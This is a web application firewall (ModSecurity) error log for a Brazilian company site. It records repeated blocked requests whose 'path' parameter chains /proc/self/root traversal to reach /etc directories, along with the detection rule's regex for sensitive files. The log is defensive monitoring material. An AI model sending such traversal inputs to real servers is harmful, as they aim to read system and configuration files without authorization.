[Mon Mar 16 13:03:06.127512 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.243.203:51074] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpupqj1wV0Si-Okefv5QAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:08.637135 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.243.203:51084] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpvJqj1wV0Si-Okefv6wAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:10.030424 2026] [:error] [pid 32654:tid 140411548894976] [client 74.7.243.203:51094] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpvglT9VtDQc7bgUy0kAAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:12.371339 2026] [:error] [pid 10709:tid 140411607643904] [client 74.7.243.203:56936] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpwBXjF1vJNtV6CWr4JwAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:13.688430 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.243.203:56946] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpwXbQATo66fKoS7xR4AAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:17.032802 2026] [:error] [pid 10709:tid 140411683178240] [client 74.7.243.203:56948] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpxRXjF1vJNtV6CWr4KQAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:18.451572 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.243.203:56964] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpxpqj1wV0Si-Okefv7wAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:19.163461 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.241.46:51102] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpxwlT9VtDQc7bgUy0mAAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:20.703085 2026] [:error] [pid 32654:tid 140411582465792] [client 74.7.243.203:56976] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpxwlT9VtDQc7bgUy0mQAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:22.051028 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.243.203:59880] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpyv9ocpUE4ed4uDzwpAAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:23.402023 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.243.203:59888] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpy7ABkC4fWIHEf8Hs9wAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:24.711619 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.243.203:59900] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpzLysWC90G-1nBrBHDAAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:28.591462 2026] [:error] [pid 32654:tid 140411674785536] [client 74.7.243.203:59902] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgp0AlT9VtDQc7bgUy0rQAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:29.939034 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.243.203:59906] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgp0XbQATo66fKoS7xR5wAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:30.585684 2026] [:error] [pid 32654:tid 140411548894976] [client 74.7.241.46:52566] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgp0glT9VtDQc7bgUy0rwAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:33.425200 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.243.203:43572] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgp1Y6lpbStxTqkSktuKAAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:34.719164 2026] [:error] [pid 21946:tid 140411716749056] [client 74.7.243.203:43586] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgp1nbQATo66fKoS7xR6wAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:37.011974 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.243.203:43600] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgp2Zqj1wV0Si-Okefv-AAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:40.378857 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.243.203:43602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgp3HbQATo66fKoS7xR7gAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:04:03.291560 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.241.46:45780] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgp83jZBu2q05ozVU9Z1AAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:04:04.244763 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.244.31:56244] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgp9HjZBu2q05ozVU9Z1QAAAU0"]
[Mon Mar 16 13:04:05.620279 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.241.46:36412] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgp9f9ocpUE4ed4uDzwsQAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
